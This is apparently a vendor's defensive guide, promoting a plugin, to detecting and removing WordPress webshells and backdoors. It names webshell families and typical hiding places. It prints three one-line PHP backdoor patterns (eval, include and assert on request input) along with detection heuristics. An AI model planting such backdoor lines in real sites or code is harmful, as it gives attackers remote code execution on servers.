Detecting WordPress Webshells and Backdoors: Complete Guide

Webshells and backdoors are among the most dangerous forms of WordPress malware. They give hackers persistent access to your site, allowing them to return even after you think you've cleaned the infection. Understanding how they work is crucial for complete removal.

What is a WordPress Webshell?

A webshell is a malicious script that provides a web-based interface for hackers to control your server. Once uploaded, attackers can browse files, execute commands, access databases, and upload additional malware—all through their web browser.

Popular Webshell Families

FilesMan

One of the most common webshells targeting WordPress. Features file management, database access, and command execution. Often found in uploads or disguised as legitimate plugin files.

WSO (Web Shell by Orb)

A feature-rich webshell with file editing, SQL execution, and network tools. Frequently updated to evade detection with new obfuscation techniques.

c99 Shell

An older but still prevalent webshell. Known for its self-destruct feature that can wipe itself to avoid forensic analysis.

b374k

A minimalist webshell that's harder to detect due to its small footprint. Can be as small as a few hundred bytes when obfuscated.

What is a WordPress Backdoor?

Backdoors are simpler than webshells but equally dangerous. They provide a hidden entry point for attackers to execute code on your server. Common backdoor patterns include:

Eval Backdoors

<?php eval($_POST['cmd']); ?>

Simple but effective. Allows execution of any PHP code sent via POST request.

Include Backdoors

<?php include($_GET['page']); ?>

Enables loading external malicious files or sensitive local files.

Assert Backdoors

<?php @assert($_REQUEST['x']); ?>

Uses PHP's assert function to execute arbitrary code. Often overlooked by basic scanners.

How Webshells and Backdoors Get Installed

1. Vulnerable plugins: Exploiting upload vulnerabilities in outdated plugins
2. Theme vulnerabilities: Especially in nulled (pirated) premium themes
3. Compromised admin accounts: Direct upload via media library or theme editor
4. Server-level compromise: Exploiting other sites on shared hosting
5. Supply chain attacks: Infected plugins from unofficial sources

Detecting Webshells and Backdoors

Common File Locations

Webshells typically hide in these locations:

• wp-content/uploads/ - Especially as image files with .php extension
• wp-includes/ - Disguised as core WordPress files
• wp-content/themes/*/ - Hidden in inactive themes
• wp-content/plugins/*/ - Inside plugin directories
• Root directory with names like wp-info.php or class.php

Suspicious File Characteristics

• Files with base64_decode, eval, or assert functions
• Heavily obfuscated code with long strings of characters
• Files accessing $_POST, $_GET, or $_REQUEST variables unsafely
• PHP files with image extensions (.jpg.php, .gif.php)
• Files with creation dates that don't match other files

Using WP Folder Shield for Detection

WP Folder Shield's malware scanner specifically targets webshells and backdoors:

• Signature detection: Identifies known webshell families by their unique code patterns
• Function analysis: Flags dangerous function combinations like eval+base64_decode
• File location checks: Alerts on PHP files in uploads directory
• Core file verification: Detects backdoors injected into legitimate WordPress files
• Permission checks: Identifies files with suspicious permissions

Removing Webshells and Backdoors

Step 1: Full Site Backup

Before any cleanup, backup your entire site including database. You may need to reference infected files later.

Step 2: Complete Scan

Run a comprehensive scan to identify ALL infected files. Webshells often come in pairs—a main shell and backup files.

Step 3: Remove or Replace

For core files, replace with clean copies from WordPress.org. For custom files, manually remove the malicious code. Delete any files that shouldn't exist.

Step 4: Database Cleanup

Check wp_options and wp_posts for injected backdoors. Some backdoors store themselves in the database and recreate files on each page load.

Step 5: Patch the Entry Point

Identify and fix the vulnerability that allowed the initial compromise. Update plugins, change passwords, and review user accounts.

Preventing Future Infections

After cleanup, prevent reinfection with WP Folder Shield's protective features:

• Directory protection: Block PHP execution in wp-content/uploads
• Web application firewall: Block common upload exploits
• File integrity monitoring: Alert on any file changes
• Login security: Prevent brute force attacks on admin accounts

Get WP Folder Shield to detect and remove webshells before they compromise your site.